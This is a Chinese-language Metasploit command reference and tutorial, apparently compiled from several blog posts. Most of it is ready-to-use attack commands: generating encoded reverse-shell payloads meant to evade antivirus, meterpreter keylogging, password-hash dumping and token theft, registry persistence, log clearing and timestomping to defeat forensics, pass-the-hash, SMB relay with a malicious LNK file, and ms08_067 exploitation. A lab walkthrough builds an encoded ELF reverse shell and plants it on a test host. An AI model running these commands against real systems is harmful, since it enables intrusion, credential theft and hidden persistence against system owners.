metasploit命令及模块

show exploits
列出metasploit框架中的所有渗透攻击模块。
show payloads
列出metasploit框架中的所有攻击载荷。
show auxiliary
列出metasploit框架中的所有辅助攻击载荷。
search name
查找metasploit框架中所有的渗透攻击和其他模块。
info
展示出制定渗透攻击或模块的相关信息。
use name
装载一个渗透攻击或模块。
LHOST
你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。
RHOST
远程主机或是目标主机。
set function
设置特定的配置参数(EG:设置本地或远程主机参数)。
setg function
以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
show options
列出某个渗透攻击或模块中所有的配置参数。
show targets
列出渗透攻击所有支持的目标平台。
set target num
指定你所知道的目标的操作系统以及补丁版本类型。
set payload name
指定想要使用的攻击载荷。
show advanced
列出所有高级配置选项。
set autorunscript migrate -f.
在渗透攻击完成后,将自动迁移到另一个进程。
check
检测目标是否选定渗透攻击存在相应的安全漏洞。
exploit
执行渗透攻击或模块来攻击目标。
exploit -j
在计划任务下进行渗透攻击(攻击将在后台进行)。
exploit -z
渗透攻击完成后不与回话进行交互。
exploit -e encoder
制定使用的攻击载荷编码方式(EG:exploit -e shikata_ga_nai)。
exploit -h
列出exploit命令的帮助信息。
sessions -l
列出可用的交互会话(在处理多个shell时使用)。
sessions -l -v
列出所有可用的交互会话以及详细信息,EG:攻击系统时使用了哪个安全漏洞。
sessions -s script
在所有活跃的metasploit会话中运行一个特定的metasploit脚本。
sessions -K
杀死所有活跃的交互会话。
sessions -c cmd
在所有活跃的metasploit会话上执行一个命令。
sessions -u sessionID
升级一个普通的win32 shell到metasploit shell。
db_create name
创建一个数据库驱动攻击所要使用的数据库(EG:db_create autopwn)。
db_connect name
创建并连接一个数据库驱动攻击所要使用的数据库(EG:db_connect user:passwd@ip/sqlname)。
db_namp
利用nmap并把扫描数据存储到数据库中(支持普通的nmap语句,EG:-sT -v -P0)。
db_autopwn -h
展示出db_autopwn命令的帮助信息。
db_autopwn -p -r -e
对所有发现的开放端口执行db_autopwn,攻击所有系统,并使用一个反弹式shell。
db_destroy
删除当前数据库。
db_destroy user:passwd@host:port/database
使用高级选项来删除数据库。
metasploit命令
help
打开meterpreter使用帮助。
run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。
sysinfo
列出受控主机的系统信息。
ls
列出目标主机的文件和文件夹信息。
use priv
加载特权提升扩展模块,来扩展metasploit库。
ps
显示所有运行的进程以及相关联的用户账户。
migrate PID
迁移到一个指定的进程ID(PID号可通过ps命令从主机上获得)。
use incognito
加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
list_tokens -u
列出目标主机用户的可用令牌。
list_tokens -g
列出目标主机用户组的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME
假冒目标主机上的可用令牌。
steal_token PID
盗窃给定进程的可用令牌并进行令牌假冒。
drop_token
停止假冒当前令牌。
getsystem
通过各种攻击向量来提升系统用户权限。
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。
reg command
在目标主机注册表中进行交互,创建,删除,查询等操作。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。
screenshot
对目标主机的屏幕进行截图。
upload file
向目标主机上传文件。
download file
从目标主机下载文件。
keyscan_start
针对远程目标主机开启键盘记录功能。
keyscan_dump
存储目标主机上捕获的键盘记录。
keyscan_stop
停止针对目标主机的键盘记录。
getprivs
尽可能多的获取目标主机上的特权。
uictl enable keyboard/mouse
接管目标主机的键盘和鼠标。
background
将你当前的metasploit shell转为后台执行。
hashdump
导出目标主机中的口令哈希值。
use sniffer
加载嗅探模式。
sniffer_interfaces
列出目标主机所有开放的网络端口。
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探。
sniffer_start interfaceID packet-buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探。
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据。
sniffer_stop interfaceID
停止嗅探。
add_user username password -h ip
在远程目标主机上添加一个用户。
clearev
清楚目标主机上的日志记录。
timestomp
修改文件属性,例如修改文件的创建时间(反取证调查)。
reboot
重启目标主机。
MSFpayload命令
msfpayload -h
msfpayload的帮助信息。
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的攻击载荷的配置项(任何攻击载荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
创建一个metasploit的reverse_tcp攻击载荷,回连到LHOSTip的LPORT,将其保存为名为payload.raw,该文件后面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
创建一个metasploit的reverse_tcp攻击载荷,导出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
创建一个metasploit的reverse_tcp攻击载荷,导出成以%u编码方式的javaScript语言字符串。
msfencode命令
mefencode -h
列出msfencode的帮助命令。
msfencode -l
列出所有可用的编码器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)
显示编码缓冲区的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
使用shikata_ga_nai编码器对payload.raw文件进行5编码,然后导出一个名为encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
创建一个经过多种编码格式嵌套编码的攻击载荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c
创建一个纯字母数字的shellcode,由ESI寄存器只想shellcode,以C语言格式输出。
MSFcli命令
msfcli | grep exploit
仅列出渗透攻击模块。
msfcli | grep exploit/windows
仅列出与windows相关的渗透攻击模块。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在PORT端口进行监听。

• MSF终端命令
o 常用命令
o 数据库相关命令
• Meterpreter命令
o 常用命令
o 系统命令
o 文件模块
o 键盘鼠标模块
o 网络命令
o 嗅探模块
o 日志清理
o 后渗透攻击模块
o 权限提升
o 信息窃取
o 口令攫取和利用
 使用sniffer嗅探模块
 通过浏览器进行口令攫取
 系统口令攫取
o 内网拓展
 添加路由
 进行445端口扫描
 哈希传递攻击
 MS08-068和MS10-046漏洞相互配合
MSF终端命令
常用命令
• show exploits
列出 Metasploit 框架中的所有渗透攻击模块
• show payloads
列表 Metasploit 框架中所有的攻击载荷
• show auxiliary
列出 Metasploit 框架中的所有辅助攻击模块
• search name
查找 Metasploit 框架中所有的渗透攻击和其他模块
• info
展示出制定渗透攻击或模块的相关信息
• use name
装载一个渗透攻击或者模块(例如:使用 use windows/smb.psexec)
• show options
列出某个渗透攻击或模块中所有的配置参数
• show targets
列出渗透攻击所支持的目标平台
• show payloads
列出所有可用的payloads
• show advanced
列出所有高级配置选项
• set payload Payload
指定要使用的攻击载荷
• set target Num
指定渗透攻击的目标平台,Num是show targets命令中所展示的索引
• set autorunscript migrate -f
在攻击完成后,将自动迁移到另一个进程
• check
检测目标是否对选定的渗透攻击存在相应安全漏洞
• exploit/run
执行攻击,部分辅助模块是用run
• exploit -j
在计划任务下进行渗透攻击(攻击将在后台进行)
• exploit -z
渗透攻击成功后不与会话进行交互
• exploit -e encoder
制定使用的攻击载荷编码方式(例如:exploit -e shikata_ga_nai)
• exploit -h
列出exploit命令的帮助信息
• sessions -I
列出可用的交互会话
• sessions -I -v
列出所有可用的交互会话以及会话详细信息
• sessions -s script
在所有活跃的 Meterpreter 会话中运行一个特定的脚本 Meterpreter 脚本
• sessions -K
杀死所有活跃的交互会话
• sessions -c cmd
在所有活跃的交互会话上执行一个命令
• sessions -u sessionID
升级一个普通的Win32 shell 到 Meterpreter shell(不知道有什么用)
• sessions -i index
进入指定交互会话
• jobs
查看当前运行的模块
数据库相关命令
• db_create name
创建一个数据库驱动攻击所要使用的数据库
• db_connect name
创建并连接一个数据库
• db_nmap
利用 nmap 并把扫描数据存储到数据库中
• db_autopwn -h
展示出 db_autopwn 命令的帮助信息
• db_autopwn -p -r -e
对所有发现的开放端口执行 db_autopwn,攻击所有系统
• db_destroy
删除当前数据库
• db_destroy user:password@host:port/database
使用高级选项来删除数据库
Meterpreter命令
常用命令
• help
打开 Meterpreter 使用帮助
• run scriptname
运行 Meterpreter 脚本,在 scripts/meterpreter 目录下可查看到所有脚本
• use priv
加载特权提升扩展模块,来扩展 Meterpreter 库
• getprivs
尽可能多地获取目标主机上的特权
• getsystem
通过各种攻击向量来提升到系统用户权限
• hashdump
导出目标主机中的口令哈希值
• rev2self
回到控制目标主机的初始用户账户下
• setdesktop number
切换到另一个用户界面(该功能基于哪些用户已登录)
• screenshot
对目标主机的屏幕进行截图
• background
将当前 Meterpreter shell 转为后台执行
• quit
关闭当前Meterpreter会话,返回MSF终端
系统命令
• ps
显示所有运行进程以及关联的用户账户
• migrate PID
迁移到一个指定的进程PID
• execute
执行目标机上的文件
例1:在目标机上隐藏执行cmd.exe
execute -H -f cmd.exe
例2:与cmd进行交互
execute -H -i -f cmd.exe
例3:直接从内存中执行攻击端的可执行文件
execute -H -m -d calc.exe -f wce.exe -a “-o foo.txt”

  1. -d选项设置需要显示的进程名
  2. 可执行文件(wce.exe)不需要在目标机上存储,不会留下痕迹
    • getpid
    获得当前会话所在进程的PID值
    • kill PID
    终结指定的PID进程
    • getuid
    获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
    • sysinfo
    列出受控主机的系统信息
    • shell
    以所有可用令牌来运行一个交互的shell
    • add_user username password -h IP
    在远程目标主机上添加一个用户
    • add_group_user “Domain Admins” username -h IP
    将用户添加到目标主机的域管理员组中
    • execute -f cmd.exe -i
    执行 cmd.exe 命令并进行交互
    • execute -f cmd.exe -i -t
    以所有可用令牌来执行 cmd 命令并交互
    • execute -f cmd.exe -i -H -t
    以所有可用令牌来执行 cmd 命令并隐藏该进程
    • reboot
    重启目标主机
    • shutdown
    关闭目标主机
    文件模块
    • ls
    列出目标主机的文件和文件夹信息
    • reg command
    在目标主机注册表中进行交互,创建、删除、查询等
    • upload file
    向目标主机上传文件
    • download file
    从目标主机下载文件
    • timestomp
    修改文件属性,例如修改文件的创建时间
    例如:timestomp file1 -f file2
    将file1文件的时间信息设置得与file2文件完全一样
    • cat
    查看文件内容
    • getwd
    获得目标机上当前的工作目录
    • edit
    编辑目标机上的文件
    • search
    对目标机上的文件进行搜索,支持星号匹配,如
    search -d c:\windows -f *.mdb
    键盘鼠标模块
    • keyscan_start
    针对目标主机开启键盘记录功能
    • keyscan_dump
    存储目标主机上捕获的键盘记录
    • keyscan_stop
    停止针对目标主机的键盘记录
    • uictl enable keyboard/mouse
    接管目标主机的键盘和鼠标
    网络命令
    • ipconfig
    获取目标机上的网络接口信息
    • portfwd
    Meterpreter内嵌的端口转发器,例如将目标机的3389端口转发到本地的1234端口
    portfwd add -l 1234 -p 3389 -r 192.168.10.142
    • route
    显示目标机的路由信息
    • run get_local_subnets
    获取目标机所配置的内网的网段信息
    嗅探模块
    • use sniffer
    加载嗅探模块
    • sniffer_interfaces
    列出目标主机所有开放的网络接口
    • sniffer_start interfaceID
    在目标主机指定网卡上开始监听
    • sniffer_dump interfaceID /tmp/xpsp1.cap
    将指定网卡上嗅探的内容dump到本地/tmp/xpsp1.cap文件中
    • sniffer_stats interfaceID
    获取正在实施嗅探网络接口的统计数据
    • sniffer_stop interfaceID
    停止嗅探
    日志清理
    • clearev
    清除目标主机上的日志记录
    • run event_manager
    清理日志
    • 删除多余的文件,修改文件的修改时间
    后渗透攻击模块
    两种使用方法
    1、在Msf终端通过 use post/xxxxxx ,然后设置相关的参数(如 SESSION),然后执行exploit
    2、在Meterpreter会话中,直接用 run post/xxxxxxxx执行
    • persistence 模块——开机自启动
    run persistence -X -i 5 -p 443 -r 192.168.10.141
    命令会在目标主机的注册表键HKLM\Software\Microsoft\Windows\Currentversion\Run中添加一个键值,达到开机自启动
    -X 参数指定启动的方式为开机自启动
    -i 参数指定反向连接的时间间隔
    对应攻击机的监听操作如下:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.141
    set LPORT 443
    exploit
    • metsvc 模块——持久化自启动
    run metsvc
    将Meterpreter以系统服务的形式安装到目标主机上,在目标主机上开启监听并等待连接
    • getgui 模块——开启远程桌面
    run getgui -u metasploit -p meterpreter
    在目标主机上添加了账号metasploit,其密码为meterpreter,并开启了远程控制终端
    这时在本地连接目标IP的3389端口即可,如果对方处在内网中,可以使用portfwd命令进行端口转发
    注意:脚本运行会在/root/.msf4/logs/scripts/getgui目录下生成clean_up__xxxxxxx.rc脚本,
    当在远程桌面操作完之后,可以使用这个脚本清除痕迹,关闭服务、删除添加的账号
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up_xxxxxx.rc
    权限提升
    • getsystem
    集成了4种权限提升技术
    getsystem
    • 利用提权模块,如MS10-073、MS10-092
    位于 /post/windows/escalate 和 exploit/windows/local 目录中
    可以通过搜索对应的漏洞编号来查看
    • 利用bypassuac模块进行绕过提权
    信息窃取
    • dumplinks 后渗透模块
    run post/windows/gather/dumplinks
    查看最近处理的文件资料,
    对每一个LNK文件,Metasploit都在/root/.msf4/loot目录下生成了对应的记录文件,包含文件的原始位置、创建和修改时间等
    • enum_applications 后渗透模块
    run post/windows/gather/enum_applications
    获得目标主机安装的软件、安全更新与漏洞补丁的信息
    • 键盘记录相关
    keyscan_start
    keyscan_dump
    keyscan_stop
    口令攫取和利用
    使用sniffer嗅探模块
    除外post/windows/gather/credentials目录下集成了数十个口令攫取的后渗透攻击模块,
    包括VNC、Outlook、FlashFXP、Coreftp、Dyndns等
    通过浏览器进行口令攫取
    • run post/windows/gather/enum_ie
    读取缓存的IE浏览器密码
    系统口令攫取
    • hashdump
    获取系统的密码哈希
    • run windows/gather/smart_hashdump
    如果hashdump不成功,尝试此命令
    如果开启了UAC,需要先使用绕过UAC的后渗透攻击模块,再获取
    内网拓展
    添加路由
    run get_local_subnets
    background
    route add 192.168.10.0 255.255.255.0 1
    route print
    意味着对192.168.10.0/24网段的所有攻击和控制的流量都将通过会话1进行转发
    进行445端口扫描
    MSF终端:
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.10.0/25
    set PORTS 445
    run
    哈希传递攻击
    MSF终端:
    use exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.128
    set LPORT 443
    set RHOST 192.168.10.2
    set SMBPass xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxx
    exploit
    MS08-068和MS10-046漏洞相互配合
    MS08-068:当目标机通过SMB协议连接到攻击者的恶意SMB服务器时,攻击者延时发送SMB响应,提取目标机发送的重要字段如NTLM哈希并对目标机进行重放,达到身份认证的目的后可以执行任意代码
    MS10-046:LNK快捷方式文件漏洞
  • 生成恶意lnk文件
    MSF终端:
    use post/windows/escalate/droplnk
    set LHOST 192.168.10.141 // 查看session的Connection字段
    set SESSION 19 // 对应的session id
    exploit
    会在目标主机的C:\WINDOWS\system32目录下创建一个Words.lnk文件,
    当存在漏洞的目标机打开了包含此快捷方式的文件夹,就会以SMB方式连接到设定的SMB服务器(192.168.10.141),以尝试加载远程图标
    • 搭建SMB服务器
    MSF终端:
    use windows/smb/smb_relay
    set SRVHOST 192.168.10.141
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.141
    exploit

msfconsole
这是启动msf的终端命令,注意因为现在msf默认的数据库是postgresql,所以在启动msf之前需要先启动postgresql数据库。
在终端中输入msfconsole即可启动msf,如果不清楚msfconsole的功能可以在终端中输入
msfconsole -h
即可学习msfconsole相关的options。
例如:

在msfconsole中需要注意的是,msfconsole不仅是直接启动msf的工具,还能用msf执行第三方相应的payload文件。
msfconsole -r payload.file
这个功能与veil配合起来很好使。veil是编码payload的神器,专门用来过杀软的,在生成相应的stagers型的payload时,也会生成stages型的payload供渗透端调用,该payload与msf兼容。
msfvenom
在之前的msf版本中会有msfencode,msfpayload等工具,学习成本比较高,现在这些工具已经被废弃了。取而代之的是msfvenom工具,可以看做它是msfencode与msfpayload的结合版,它允许你自行生成想要的payload。
想要学习msfvenom,可以在终端中打:
msfvenom -h
可以看到msfvenom的介绍。
如果你需要看到msfvenom现有的payload,可以用
msfvenom -l payloads
查看所有可利用的payloads。
下面我们用linux/x86/meterpreter/reverse_tcp这个payload来演示生成可x86架构下可执行的elf文件。
只需在命令行中输入:
freestyle4568@freestyle4568 ~ $ msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options
即可看到该payload的参数选项:

值得注意的是arch选项,用来表示该payload适用的内核架构,如果是x86架构的内核,可以正常运行,但是如果是x64架构的内核就不能运行。x86_64架构的内核是既能运行32位程序,又能运行64位程序。
关于如何查看内核架构,可以:
freestyle4568@freestyle4568 ~ $ uname -a
Linux freestyle4568 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
可以看到msfadmin的内核架构是x86架构,i686架构也是x86的一种,该平台上只能运行32位程序。
下面我们生成一个metasploitable上的payload可执行程序:
freestyle4568@freestyle4568 ~ $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 -f elf -e x86/shikata_ga_nai -i 3 -o shell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 98 (iteration=0)
x86/shikata_ga_nai succeeded with size 125 (iteration=1)
x86/shikata_ga_nai succeeded with size 152 (iteration=2)
x86/shikata_ga_nai chosen with final size 152
Payload size: 152 bytes
Final size of elf file: 236 bytes
Saved as: shell
可以看到未设置的options是用payload中默认的选项。下面shell文件即为elf可执行文件,适用与x86的linux内核上。同时我们x86/shikata_ga_nai编码对它进行3次编码,为了免杀(当然这个目前会被360检测出来,以后可以用更加高级的免杀工具,这里为了实验)。
我们将它拷贝进入metasploitable系统中,我们在freestyle4568系统中用相应的handler进行监听了连接。
freestyle4568@freestyle4568 ~ $ scp shell msfadmin@192.168.1.103:/home/msfadmin
msfadmin@192.168.1.103’s password:
shell 100% 236 0.2KB/s 00:00
在msfadmin中运行shell文件,然后在freestyle4568中用msf进行侦听。

OK啦!现在拿到了meterpreter,现在基本已经控制了192.168.1.103了。
关于meterpreter,有空再另开一篇,因为这个payloader太强大了。

metasploit的模块构成及功能分析
今天我们介绍一下metasploit的基础架构和
市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。
exploit@ubuntu:/pentest/framework3$ ls
CONTRIBUTING.md README.md data metasploit-framework-db.gemspec msfconsole msfrop putty.exe
COPYING Rakefile db metasploit-framework-full.gemspec msfd msfrpc script
Gemfile a.exe documentation metasploit-framework-pcap.gemspec msfelfscan msfrpcd scripts
Gemfile.local.example app external metasploit-framework.gemspec msfencode msfupdate spec
Gemfile.lock av.exe features modules msfmachscan msfvenom test
HACKING back.pl lib msfbinscan msfpayload payload.exe tools
LICENSE config log msfcli msfpescan plugins
通过以上我们可以看到metasploit的基本为文件结构
config --metasploit的环境配置信息,数据库配置信息
data--后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
db--rails编译生成msf的web框架时的数据库信息
documentation--用户说明文档及开发文档
external--metasploit的一些基础扩展模块
libs--metasploit的一些基础类和第三方模块类
log--msf运行时的一些系统信息和其他信息
modules--metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
msfbinscan--对bin文件进行文件偏移地址扫描
msfcli--metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
msfconsole--metasploit的基本命令行,集成了各种功能。
msfd--metasploit服务,非持久性服务
msfelfscan--对linux的elf文件偏移地址进行扫描
msfencode--metasploit的编码模块,可以对mepayload和shellcode进行编码输出
msfpayload--metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的shellocode,新版本的metasploit即将在2015年6月18日弃用,用msfvenmon替代。
msfmachscan--功能同msfelfscan
msfpescan--对windows的pe格式文件偏移地址进行扫描
msfrop--对windows的pe进行文件地址偏移操作,可以绕过alsr等
msfrpc--metasploit的服务端,非持久性的rpc服务
msfrpcd--持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
msfupdate--metasploit更新模块,可以用来更新metasploit模块
msfvenom--集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencode
plugins--metasploit的第三方插件接口
scripts--metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
test--metasploit的基本测试目录
tools--额外的小工具和第三方脚本工具
下面我们对这些常用命令的用法做一些解释
msfcli 虽然和msfconsole一样同为命令行界面,但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。
exploit@ubuntu:/pentest/framework3$ msfcli -h
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
Usage: /usr/local/bin/msfcli [mode]

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module #显示该模块的高级选项
(AC)tions Show available actions for this module #显示该模块的详细设置操作选项
©heck Run the check routine of the selected module #运行选择的模块进行检测
(E)xecute Execute the selected module #执行选择的模块
(H)elp You’re looking at it baby! #显示msfcli的帮助信息
(I)DS Evasion Show available ids evasion options for this module #显示该模块的ids
(M)issing Show empty required options for this module #查看必须的操作选项有哪些没有设置
(O)ptions Show available options for this module #查看可用的选项
§ayloads Show available payloads for this module #查看模块可用的payload模块
(S)ummary Show information about this module #显示该模块的详细信息
(T)argets Show available targets for this exploit module #显示该溢出模块针对的目标类型
Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
这里我们就msfcli的一些具体的参数来解释:
最常见的用法就是利用metasploit的辅助模块和攻击模块对目标进行操作
这里我们针对http_version的模块选项进行显示,查看有哪些操作选项。
exploit@ubuntu:/pentest/framework3$ msfcli auxiliary/scanner/http/http_version rhost=106.186.118.91 O
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[] Initializing modules…
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
这里会显示针对ms08_067可以使用的payload的信息,我们可以根据我们的系统平台环境和网络环境进行选择。
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
显示08067的操作高级属性,这样在有针对性的针对某些版本溢出时,可以达到更好的效果
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[
] Initializing modules…
Compatible payloads

Name Description


generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from
the IP defined in KHOST. This IP will work as an authentication method
(you can spoof it with tools like hping). After that you could get your
shellcode from any IP. The socket will appear as “closed” helping us to
hide the shellcode
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for a connection over IPv6
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP hop point. Note that you must first upload
exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
M参数显示正在使用的模块有哪些必须的参数没有设置,操作我们可以发现,需要设置远程的服务器ip
exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules…
Name Current Setting Required Description


RHOST yes The target address
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
E 参数,是执行当前的选择的模块,如下图,我们选择http服务版本探测,设置好参数,加上E参数,执行当前模块
msfcli的另外一个参数是t,这里是选择我们针对的远程目标的版本的选择,如下图,我们可以选择合适的目标来进行远程溢出
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi t
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules…
Id Name


0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP2 English (NO NX)
62 Windows 2003 SP2 English (NX)
63 Windows 2003 SP2 German (NO NX)
64 Windows 2003 SP2 German (NX)
65 Windows 2003 SP2 Portuguese - Brazilian (NX)
66 Windows 2003 SP2 Spanish (NO NX)
67 Windows 2003 SP2 Spanish (NX)
68 Windows 2003 SP2 Japanese (NO NX)
根据上面的介绍,我们来对目标ip通过ms08_067_netapi进行远程攻击,参数设置如下
